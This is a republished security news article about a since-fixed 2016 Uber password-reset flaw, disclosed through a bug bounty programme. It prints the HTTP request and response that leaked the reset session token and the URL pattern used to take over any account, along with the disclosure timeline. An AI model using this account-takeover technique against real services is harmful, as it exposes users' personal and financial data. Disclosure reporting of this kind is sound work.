神刀安全网

An Italian expert discovered a critical Improper Authentication vulnerability affecting the…

The Italian security expert Vincenzo C. Aka @Procode701 has discovered 7 months ago a critical vulnerability in UBER platform that allowed password reset for any Uber account.

The researcher reported the ‘Improper Authentication’ vulnerability through the company Bug Bounty program operated by Hackerone .

“With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.” reads the summary published UBER.

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The Italian expert has discovered a serious problem in the password reset process that could be exploited to generate an authentication token “inAuthSessionID” that could be used to change the password for any account.

I contacted the experts for further details and he told me that just sending a password reset request using a valid email address of any Uber account, the reply included the session token “inAuthSessionID.” The Uber platform was generating a specific session token every time a user was sending password reset email.

An Italian expert discovered a critical Improper Authentication vulnerability affecting the...

Once obtained the session token “inAuthSessionID” it was possible to change the password using the standard link that is present in the change password form.

An Italian expert discovered a critical Improper Authentication vulnerability affecting the...

  1. https://auth.uber.com/login/stage/PASTE  SESSION ID <— inAuthSessionID generated through the chaneg password email  /af9b9d0c-bb98-41de-876c-4cb911c79bd1 <– tokenID with no expiration date.
POST /login/handleanswer HTTP/1.1  Host: auth.uber.com  { "init": false,     "answer": {        "type": "PASSWORD_RESET_WITH_EMAIL",        "userIdentifier": {            "email": "xxxx@uber.com"        }     }  } Reply
HTTP/1.1 200 OK   {       "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",       "stage": {           "question": {                         "signinToken": "",                         "type": "VERIFY_PASSWORD_RESET",                          "tripChallenges": []                       },                       "alternatives": []        }  }

The impact of the vulnerability is severe, it allowed a hacker to access any account and any user’s data (i.e. ID Card, banking data, Driver License), including financial one.

Below the timeline of the vulnerability:

October 2, 2016 – Bug reported to the company

October 4, 2016 – Flaw Triaged

October 6, 2016 – Flaw Resolved

October 18, 2016 – Researcher rewarded with $10,000 USD.

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » An Italian expert discovered a critical Improper Authentication vulnerability affecting the…

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址